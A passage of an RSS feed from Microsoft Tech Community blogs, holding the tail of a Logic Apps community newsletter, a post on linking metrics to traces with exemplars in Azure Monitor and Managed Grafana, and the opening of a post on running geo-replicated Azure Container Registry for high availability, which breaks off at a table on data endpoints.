&lt;P&gt;Post by &lt;A href="https://nl.linkedin.com/in/%C5%9Fahin-%C3%B6zdemir-2058666?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Şahin Özdemir&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This post introduces Azure Connector Namespaces and previews managed connectors for Azure Functions, extending the Logic Apps connector ecosystem to more compute services. It explains the motivation, how namespaces decouple connectors from workflows, and the benefits: reduced custom code, consistent authentication via managed identity, and reuse of Microsoft-managed integrations. A step-by-step walkthrough shows creating a namespace, adding a managed connector, and using the Azure Connectors .NET SDK in Functions, illustrating how teams can standardize connectivity while keeping business logic in code.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.sonnygillissen.nl/blog/azure/azure-logic-apps/stop-working-harder-and-start-flowing-smarter-with-logic-apps-automation/" target="_blank" rel="noopener noreferrer"&gt;Stop working harder and start flowing smarter, with Logic Apps Automation&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://nl.linkedin.com/in/sonnygillissen?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sonny Gillissen&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Sonny Gillissen explores Logic Apps Automation, a new, governed experience for building enterprise automations. He explains the Project → Application → Workflow model, dedicated portal (auto.azure.com), and reusable Sandboxes for agent code. The post shows how the AI assistant can scaffold workflows from intent, with Knowledge sources to ground agents, while monitoring and analytics provide visibility. Benefits include familiar Logic Apps design, reduced operational overhead, and scale-to-zero. Current gaps are noted—OBO auth shift, occasional assistant syntax issues, managed vs. built‑in connector choices, no migration tooling yet, and pending VNet/private endpoint support.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://anithasantosh.wordpress.com/2026/05/05/dixf-export-with-dynamic-filter-using-logic-apps/" target="_blank" rel="noopener noreferrer"&gt;Stop Using Static Filters! Automate DIXF Exports with Logic App&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://uk.linkedin.com/in/anithaeswaran?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Anitha Eswaran&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Anitha Eswaran demonstrates how to make DIXF exports in D365FO dynamic using Azure Logic Apps and a small X++ customization. A custom OData action updates the DIXF Definition Group filter at runtime based on a parameter such as Customer Group. A Logic App triggered by a business event parses the input, stores the value, calls the OData action, invokes the standard ExportToPackage API, and then retrieves the download URL via GetExportedPackageUrl to fetch the ZIP with a time‑limited SAS token. Screenshots and code samples illustrate the end‑to‑end flow and implementation details.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.youtube.com/watch?v=yF8YB6ag_HY" target="_blank" rel="noopener noreferrer"&gt;Logic Apps Agent Loops: Master Class&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Video by &lt;A href="https://www.linkedin.com/in/stephen-w-thomas?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Stephen W Thomas&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Stephen W Thomas compiles his full Logic Apps Agent Loop series into one master‑class video. It covers getting started with Agent Loop on Logic Apps Standard, a human‑in‑the‑loop pattern used to resolve failed code translations, interactive chat agents with secure website embedding via Easy Auth, and when to choose the Consumption tier for simpler, pay‑as‑you‑go deployments. The chaptered format lets viewers jump to relevant topics. The emphasis is on the orchestration pattern—agents that select and compose tools to achieve goals—offering a practical foundation for teams moving from deterministic workflows toward agentic automation.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://dev.to/imdj/forget-sampling-this-one-hostjson-setting-cuts-logic-apps-telemetry-costs-by-80-2dpj" target="_blank" rel="noopener noreferrer"&gt;Forget Sampling — This One host.json Setting Cuts Logic Apps Telemetry Costs by 80%&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://be.linkedin.com/in/danielj45?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Daniel Jonathan&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This article tackles high Application Insights ingestion costs in Logic Apps Standard and shows a data‑driven path to reduce spend. Through a controlled experiment, it demonstrates that switching Runtime.ApplicationInsightTelemetryVersion to v2 in host.json delivers ~80% reduction without sacrificing troubleshooting. Further options include disabling dependency tracking (eliminates AppDependencies with the trade‑off of losing per‑call HTTP detail) and using adaptive sampling for marginal additional savings, while excluding exceptions. It also explains why some run‑level telemetry bypasses sampling and how to toggle sampling via an environment variable for short‑term diagnostics.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.linkedin.com/pulse/production-only-truth-integration-marcelo-gomes-bwlne?trk=public_post_feed-article-content" target="_blank" rel="noopener noreferrer"&gt;Production Is the Only Truth in Integration&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/marcelogomesdasilva/en?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Marcelo Gomes&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This piece reframes integration success through a production‑first lens. It argues that reliability emerges when systems are designed for failure as the norm, not the exception. The article urges separating orchestration from business logic—using tools like Azure Logic Apps for coordination and Azure Functions for rules and transformations—to keep retries safe and evolution predictable. It positions production‑readiness as a design concern, emphasizing idempotency, replay, observability, runbooks, and ownership. The practical outcome is reduced operational risk and cost, more predictable behavior, and greater business trust in automated processes.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://youtu.be/GhSlwiGYzd8" target="_blank" rel="noopener noreferrer"&gt;DevUP Talks #05 – Logic Apps Tips &amp;amp; Tricks with Sandro Pereira&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Video by &lt;A href="https://se.linkedin.com/in/logdberg?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Mattias Lögdberg&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;In this session, Sandro Pereira distills practical guidance from real projects to help teams build more resilient Logic Apps. Topics include applying environment‑specific timer conditions, deploying Logic Apps in a disabled state to control activation during releases, and using User‑Managed Identity with Azure Service Bus in Logic Apps Standard. The video focuses on patterns that improve reliability, security, and operational control across environments, offering actionable advice for developers and architects working in Azure Integration Services who want fewer surprises in production and a smoother deployment lifecycle.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://blog.sandro-pereira.com/2026/05/06/logic-apps-service-bus-user-assigned-managed-identity/" target="_blank" rel="noopener noreferrer"&gt;Logic Apps: Service Bus with User‑Assigned Managed Identity&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/sandropereira?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sandro Pereira&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This best‑practices guide shows how to configure the Azure Service Bus connector in Logic Apps Standard to use a user‑assigned managed identity. Sandro Pereira explains why system‑assigned identities complicate CI/CD—RBAC can’t be fully declared until the identity exists—then demonstrates a pattern that keeps deployments reproducible. The approach uses app settings for the Service Bus namespace and identity resource ID, a custom serviceProviderConnections entry referencing those settings, and workflow actions bound to that connection. The result is secretless, declarative authentication that avoids RBAC timing issues across environments.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://blog.sandro-pereira.com/2024/02/09/logic-app-consumption-bulk-failed-runs-resubmit-tool/" target="_blank" rel="noopener noreferrer"&gt;Logic App Consumption Bulk Failed Runs Resubmit Tool&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/sandropereira?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sandro Pereira&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Sandro Pereira introduces a small .NET Windows utility that lists and bulk resubmits failed Logic Apps Consumption runs. After authenticating to Azure, users supply the Logic App name, resource group and subscription. The tool can optionally filter by a date range, otherwise it returns up to 250 failed runs for fast triage. It targets a common pain point the portal features don’t fully streamline and includes a link to the GitHub source so teams can adapt or integrate it into operational workflows. A concise “one‑minute brief” outlines the problem and practical benefits.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://blog.sandro-pereira.com/2026/04/30/control-initial-state-logic-apps-standard-workflows/" target="_blank" rel="noopener noreferrer"&gt;Control the Initial State of Logic Apps Standard Workflows&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/sandropereira?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sandro Pereira&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This tip explains how to prevent Logic Apps Standard workflows from starting immediately after deployment—a common production risk. Instead of a state property in ARM/Bicep, the initial state is controlled via App Settings on the underlying App Service. By setting Workflows..FlowState to Disabled (in local.settings.json and/or app settings), teams ensure workflows deploy in a safe, non‑running state. The article outlines the rationale, differences from Consumption, and provides concrete examples and screenshots to adopt the practice across environments.&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 19:10:51 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-integration-services-blog/logic-apps-aviators-newsletter-june-2026/ba-p/4526525</guid>
      <dc:creator>WSilveira</dc:creator>
      <dc:date>2026-06-08T19:10:51Z</dc:date>
    </item>
    <item>
      <title>Connect Metrics to Traces with Exemplars in Azure Monitor</title>
      <link>https://techcommunity.microsoft.com/t5/azure-observability-blog/connect-metrics-to-traces-with-exemplars-in-azure-monitor/ba-p/4525714</link>
      <description>&lt;P&gt;Following Microsoft’s recent &lt;A href="https://techcommunity.microsoft.com/blog/azureobservabilityblog/direct-opentelemetry-ingestion-into-azure-monitor-is-now-generally-available/4524044" target="_blank" rel="noopener"&gt;GA announcement for OpenTelemetry (OTel) support&lt;/A&gt;, we are excited to announce support for &lt;STRONG&gt;Exemplars&lt;/STRONG&gt; for customers instrumenting metrics with Prometheus or OpenTelemetry and traces using OpenTelemetry, enhancing Azure Monitor’s integrated observability experience for cloud-native applications.&lt;/P&gt;
&lt;P&gt;Modern cloud-native applications generate enormous volumes of telemetry. Metrics help teams detect that something is wrong, but traces explain &lt;EM&gt;why&lt;/EM&gt;. Exemplars bridge these two worlds by attaching trace references directly to metric data points, making it dramatically easier to pivot from a spike in latency or errors to the exact distributed trace responsible for the issue.&lt;/P&gt;
&lt;P&gt;With Azure Monitor, customers can now ingest metrics with exemplars and visualize them in Azure Managed Grafana. This enables seamless correlation between metrics and traces, helping engineering teams troubleshoot issues faster and reduce mean time to resolution (MTTR).&lt;/P&gt;
&lt;H1&gt;Why Exemplars Matter&lt;/H1&gt;
&lt;P&gt;Traditional monitoring workflows often require users to manually correlate data across multiple systems. Exemplars simplify this workflow by embedding trace context directly into metric samples. For example, if a latency metric spikes at a specific timestamp, the exemplar associated with that data point can link directly to the distributed trace responsible for the outlier.&lt;/P&gt;
&lt;P&gt;This provides several benefits:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Faster root cause analysis&lt;/LI&gt;
&lt;LI&gt;Quicker transition from aggregate metrics to request-level details&lt;/LI&gt;
&lt;LI&gt;Simplified debugging workflows for SRE and platform teams&lt;/LI&gt;
&lt;LI&gt;Better observability experiences for microservices and distributed applications&lt;/LI&gt;
&lt;/UL&gt;
&lt;H1&gt;Unified Observability with Azure Monitor&lt;/H1&gt;
&lt;P&gt;With Azure Monitor and Azure Managed Grafana, you can now:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Ingest OTLP or Prometheus metrics with exemplars into Azure Monitor Workspace&lt;/LI&gt;
&lt;LI&gt;Store and analyze traces in Azure Monitor Application Insights&lt;/LI&gt;
&lt;LI&gt;Visualize exemplar markers directly in Grafana charts&lt;/LI&gt;
&lt;LI&gt;Navigate from a metric spike to the exact distributed trace associated with that data point&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;By combining these signals in a single observability platform, organizations can correlate infrastructure health, application behavior, and request traces without context switching between tooling.&lt;/P&gt;
&lt;H1&gt;How It Works&lt;/H1&gt;
&lt;P&gt;Once metrics, exemplars, and traces are ingested into Azure Monitor, Azure Managed Grafana can consume exemplar information from the configured Prometheus data source. When exemplars are enabled in Grafana dashboards, users will see markers associated with individual metric data points. Selecting an exemplar opens the associated trace in Azure Monitor, providing end-to-end diagnostic context.&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1&gt;Getting Started&lt;/H1&gt;
&lt;H1&gt;Setup data ingestion:&lt;/H1&gt;
&lt;UL&gt;
&lt;LI&gt;Instrument your application to emit OpenTelemetry traces, OpenTelemetry or Prometheus metrics with exemplars, and enable ingestion of the same to Azure Monitor using OpenTelemetry Collector. Follow the instructions in &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/containers/opentelemetry-protocol-ingestion" target="_blank" rel="noopener"&gt;Ingest OTLP Data into Azure Monitor with OTel Collector - Azure Monitor | Microsoft Learn&lt;/A&gt;. After this step, you will have the Log Analytics Workspace, Azure Monitor Workspace and Application Insights resources all set up to store the telemetry data.&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/managed-grafana/quickstart-managed-grafana-portal" target="_blank" rel="noopener"&gt;Create an Azure Managed Grafana&lt;/A&gt; instance and connect it with the Azure Monitor Workspace by navigating to your Azure Monitor Workspace in the Azure portal and then clicking on “Linked Grafana workspaces”. To learn more, see &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/metrics/azure-monitor-workspace-manage?tabs=azure-portal#link-a-grafana-workspace" target="_blank" rel="noopener"&gt;Manage an Azure Monitor workspace - Azure Monitor | Microsoft Learn&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Optionally, &lt;A href="https://learn.microsoft.com/azure/azure-monitor/containers/kubernetes-monitoring-tutorial" target="_blank" rel="noopener"&gt;enable Azure Managed Prometheus&lt;/A&gt; on your AKS cluster or use remote-write and configure it to use the same Azure Monitor Workspace to centralize infrastructure and application metrics.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Enable Exemplars in Azure Managed Grafana:&lt;/H2&gt;
&lt;P&gt;After setting up the data ingestion, ensure that logs and traces are flowing into Log Analytics Workspace, and metrics are flowing into Azure Monitor Workspace.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1: Enable Exemplars on Prometheus Data Source in Azure Managed Grafana&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Navigate to &lt;STRONG&gt;Connections&lt;/STRONG&gt; -&amp;gt; &lt;STRONG&gt;Data Sources&lt;/STRONG&gt; in Azure Managed Grafana. Since you have connected Azure Managed Grafana to Azure Monitor Workspace, you will see the data source (Managed_Prometheus_&amp;lt;AMW-Name&amp;gt;) already configured. If the data source is not configured, follow the steps &lt;A href="https://learn.microsoft.com/azure/managed-grafana/how-to-connect-azure-monitor-workspace" target="_blank" rel="noopener"&gt;here&lt;/A&gt; to add your Azure Monitor Workspace as a data source.&lt;/LI&gt;
&lt;LI&gt;Open the data source configuration.&lt;/LI&gt;
&lt;LI&gt;Click &lt;STRONG&gt;Add Exemplars&lt;/STRONG&gt; to enable exemplar support.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2: Configure Trace Linking with Azure Monitor&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;In the exemplar configuration section, toggle &lt;STRONG&gt;Internal Link&lt;/STRONG&gt; to &lt;STRONG&gt;On&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;LI&gt;Select &lt;STRONG&gt;Azure Monitor&lt;/STRONG&gt; as the data source.&lt;/LI&gt;
&lt;LI&gt;In the &lt;STRONG&gt;Label Name&lt;/STRONG&gt;, enter the name of the field in the labels object that should be used to get the trace id, eg. trace_id.&lt;/LI&gt;
&lt;LI&gt;Click &lt;STRONG&gt;Save &amp;amp; Test&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;This configuration enables direct navigation from exemplar markers in Grafana charts to the associated traces stored in Azure Monitor. Azure Managed Grafana also supports trace correlation from other solutions like&amp;nbsp;&lt;SPAN data-teams="true"&gt;Jaeger etc. To use your trace solution, use the appropriate links.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3: Enable Exemplars in Dashboards&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Navigate to a Grafana dashboard that uses your configured Prometheus data source.&lt;/LI&gt;
&lt;LI&gt;Open the panel options for a metrics chart.&lt;/LI&gt;
&lt;LI&gt;Toggle &lt;STRONG&gt;Exemplars&lt;/STRONG&gt; to &lt;STRONG&gt;On&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Once enabled, exemplar markers will appear on supported metric visualizations. Clicking on it will show exemplar details along with an option to open the corresponding distributed trace in Azure Monitor.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;To learn more, visit&amp;nbsp;&lt;A href="https://aka.ms/azmon-exemplars" target="_blank" rel="noopener"&gt;https://aka.ms/azmon-exemplars&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 17:21:43 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-observability-blog/connect-metrics-to-traces-with-exemplars-in-azure-monitor/ba-p/4525714</guid>
      <dc:creator>sunayanasingh</dc:creator>
      <dc:date>2026-06-08T17:21:43Z</dc:date>
    </item>
    <item>
      <title>Designing for High Availability: The Operational Reference for Running a Geo-Replicated ACR</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/designing-for-high-availability-the-operational-reference-for/ba-p/4526465</link>
      <description>&lt;P&gt;By&amp;nbsp;&lt;A class="lia-external-url" href="https://www.linkedin.com/in/johnsonshi/" target="_blank" rel="noopener"&gt;Johnson Shi&lt;/A&gt;&lt;EM&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/zhuyul/" target="_blank" rel="noopener"&gt;Zoey (Zhuyu) Li&lt;/A&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/huangli-wu-806070126/" target="_blank" rel="noopener"&gt;Huangli Wu&lt;/A&gt;&lt;/EM&gt;&lt;/P&gt;
&lt;H2 id="introduction"&gt;Introduction&lt;/H2&gt;
&lt;P&gt;Three of the most common questions we hear from enterprise teams running geo-replicated Azure Container Registries (ACR) are:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;"How do I control which region serves my traffic?"&lt;/STRONG&gt; — When my AKS clusters are spread across regions, can I pin each one to its co-located replica, or am I stuck with however the global endpoint routes?&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;"What happens during a regional incident — is failover automatic or do I have to act?"&lt;/STRONG&gt; — If the registry in one region degrades, does the global endpoint reroute on its own, or do I need to manually disable the affected replica?&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;"What happens after the region recovers — does traffic return on its own?"&lt;/STRONG&gt; — Is there a cooldown, a quarantine, or any manual step before failback?&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;We answer those head-on, then go deeper on the operational details that come up when you actually run a geo-replicated registry: authentication across endpoint switches, throttling under load concentration, eventual-consistency failure modes, home region outage scope, webhooks, and private endpoint interaction. We draw on the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;official geo-replication docs&lt;/A&gt;, the &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/health-aware-failover-for-azure-container-registry-geo-replication/4501730" target="_blank" rel="noopener" data-lia-auto-title="global endpoint health-aware failover blog" data-lia-auto-title-active="0"&gt;global endpoint health-aware failover blog&lt;/A&gt;, the &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/determinism-over-magic-the-engineering-design-behind-azure-container-registry-re/4524101" target="_blank" rel="noopener" data-lia-auto-title="regional endpoints engineering design implementation" data-lia-auto-title-active="0"&gt;regional endpoints engineering design implementation&lt;/A&gt;, the regional endpoints &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-azure-container-registry-geo-replication-%E2%80%94-now-in-public-/4525717" target="_blank" rel="noopener" data-lia-auto-title="public preview" data-lia-auto-title-active="0"&gt;public preview&lt;/A&gt; and &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-geo-replicated-azure-container-registries-private-preview/4496186" target="_blank" rel="noopener" data-lia-auto-title="private preview" data-lia-auto-title-active="0"&gt;private preview&lt;/A&gt; announcements, and the&amp;nbsp;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;ACR reference for various registry endpoints&lt;/A&gt;, . This post also draws notes from the ACR product team on roadmap items that aren't yet documented elsewhere.&lt;/P&gt;
&lt;H2 id="key-takeaways"&gt;Key Takeaways&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Health-aware failover is automatic.&lt;/STRONG&gt; When the registry in a region degrades, the global endpoint reroutes away from it on the order of minutes, evaluated per-registry. No customer action required.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Failback is automatic too.&lt;/STRONG&gt; Once health-aware failover marks a region healthy again, the global endpoint resumes routing to it. There is no cooldown period.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Health-aware failover applies only to global endpoint operations.&lt;/STRONG&gt; It does not apply to regional endpoints (you're talking to one replica, period) or to dedicated data endpoints (the redirect is per-region).&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Health-aware failover is not triggered by throttling.&lt;/STRONG&gt; It responds to regional ACR service health and Azure infrastructure health, not HTTP 429 responses. Use regional endpoints to manage per-replica throttling.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints (Step 2a) give you explicit per-region URLs&lt;/STRONG&gt; for workloads that need affinity, capacity planning, push/pull consistency, troubleshooting, or client-side failover. Use &lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;. Regional endpoints are available on &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-skus" target="_blank" rel="noopener"&gt;Premium SKU&lt;/A&gt; registries.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;For workloads that don't need pinning, do nothing (Step 2b).&lt;/STRONG&gt; The global endpoint plus health-aware failover handles routing automatically.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Re-authenticate when switching endpoints.&lt;/STRONG&gt; Each global or regional endpoint is its own authenticated surface; re-auth via &lt;CODE&gt;az acr login&lt;/CODE&gt;, SDK auth, or the Kubernetes ACR credential provider on endpoint change.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Don't run a long-lived DNS cache for the global endpoint.&lt;/STRONG&gt; ACR purges DNS server-side on disable and during failover; a long-lived client cache works against that.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;For production workloads, enable dedicated data endpoints&lt;/STRONG&gt; for security and DNS predictability on layer downloads.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;ACR is working on bounded staleness consistency&lt;/STRONG&gt; for cross-replica eventual-consistency failure modes; see the FAQ.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 id="background"&gt;Background&lt;/H2&gt;
&lt;H3 id="what-is-acr-geo-replication-"&gt;What is ACR geo-replication?&lt;/H3&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;Geo-replication&lt;/A&gt; is a &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-skus" target="_blank" rel="noopener"&gt;Premium SKU&lt;/A&gt; feature that turns a single ACR registry into a &lt;STRONG&gt;multi-region, multi-write&lt;/STRONG&gt; service. Every geo-replica in every region is writable — &lt;STRONG&gt;you can push, pull, and delete from any of them&lt;/STRONG&gt; — and &lt;STRONG&gt;content syncs asynchronously between replicas under an eventual consistency&lt;/STRONG&gt; &lt;STRONG&gt;model&lt;/STRONG&gt;. &lt;EM&gt;Per-push replication time scales with the size and number of images being pushed&lt;/EM&gt;. Similarly, &lt;EM&gt;when creating a new geo-replica, the time to populate the new geo-replica scales with the total size of the registry&lt;/EM&gt;.&lt;/P&gt;
&lt;P&gt;A geo-replicated registry exposes a &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; at &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. Behind that endpoint, ACR uses an internal traffic manager to direct each request to the replica with the best network performance profile for the caller — usually the closest replica, but not always. When clients are equidistant from multiple replicas, or when the closest replica is experiencing Azure infrastructure degradation, requests may be routed elsewhere. A geo-replicated registry also exposes a&amp;nbsp;&lt;STRONG&gt;regional endpoint&lt;/STRONG&gt; at &lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;, which allows clients to pin API requests to a specific geo-replica in lieu of global endpoints, which has Azure-managed routing among geo-replicas.&lt;/P&gt;
&lt;P&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/container-registry/zone-redundancy" target="_blank" rel="noopener"&gt;Zone redundancy&lt;/A&gt; is always enabled for geo-replicas in regions where Azure has multiple availability zones — in those regions, ACR automatically spreads replica data across multiple availability zones within each region to protect against zonal outages.&lt;/P&gt;
&lt;H3 id="endpoints-and-data-endpoints-what-goes-where"&gt;Endpoints and data endpoints: what goes where&lt;/H3&gt;
&lt;P&gt;A common point of confusion: when you push or pull, not every request goes to the same place. The registry endpoints (global endpoint and regional endpoints), as well as the data endpoint, do different jobs. Your choice of data endpoint configuration has real consequences for security and resilience.&lt;/P&gt;
&lt;P&gt;Two kinds of traffic flow during a typical pull:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Registry API traffic&lt;/STRONG&gt; — authentication, manifest reads/writes, tag resolution, referrers, repository operations, blob location lookups, listing, metadata. This is everything except the actual layer (blob) bytes. All these API requests go to the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; (&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;) or, if you've pinned your clients to call these APIs to a specific geo-replica, a geo-replica's &lt;STRONG&gt;regional endpoint&lt;/STRONG&gt; (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;). Behind the scenes, the global endpoint internally proxies these requests to a specific geo-replica.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Layer (blob) downloads&lt;/STRONG&gt; — when the client asks for a blob, the registry doesn't serve the bytes itself. It returns an HTTP 307 redirect to a &lt;STRONG&gt;regional &lt;U&gt;data&lt;/U&gt; endpoint (separate endpoint from the global endpoint or regional endpoints)&lt;/STRONG&gt;, and the client follows the redirect to download the layer from that region.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Where that 307 sends you depends on &lt;STRONG&gt;whether you've enabled the registry's dedicated data endpoints feature&lt;/STRONG&gt;:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Configuration&lt;/th&gt;&lt;th&gt;Layer downloads redirect to&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Default (no dedicated data endpoints)&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;*.blob.core.windows.net&lt;/CODE&gt; (the underlying Azure storage account)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Dedicated data endpoints enabled&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt; for the region you were routed to&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Private endpoints enabled&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt; for the region you were routed to&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
